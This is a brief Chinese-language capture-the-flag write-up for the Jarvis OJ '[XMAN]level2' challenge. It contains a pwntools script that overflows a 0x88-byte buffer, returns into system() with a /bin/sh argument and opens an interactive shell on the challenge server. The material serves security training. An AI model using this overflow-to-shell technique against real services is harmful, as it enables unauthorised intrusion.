[XMAN]level2
Posted alyx
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[XMAN]level2相关的知识,希望对你有一定的参考价值。
老套路
checksec
ida查看
覆盖掉
之后system地址再返回覆盖 最后/bin/sh地址
# -*- coding:utf-8 -*- from pwn import * sh = remote(‘pwn2.jarvisoj.com‘, 9878) # remote junk = ‘a‘ * 0x88 fakebp = ‘a‘*4 sh_address = 0x0804A024 # /bin/sh sys_address = 0x08048320 payload = junk + fakebp + p32(sys_address)+‘aaaa‘+p32(sh_address) sh.send(payload) sh.interactive()
以上是关于[XMAN]level2的主要内容,如果未能解决你的问题,请参考以下文章
Jarvis OJ - [XMAN]level2 - Writeup
[转]Jarvis OJ- [XMAN]level2/3_x64-Writeup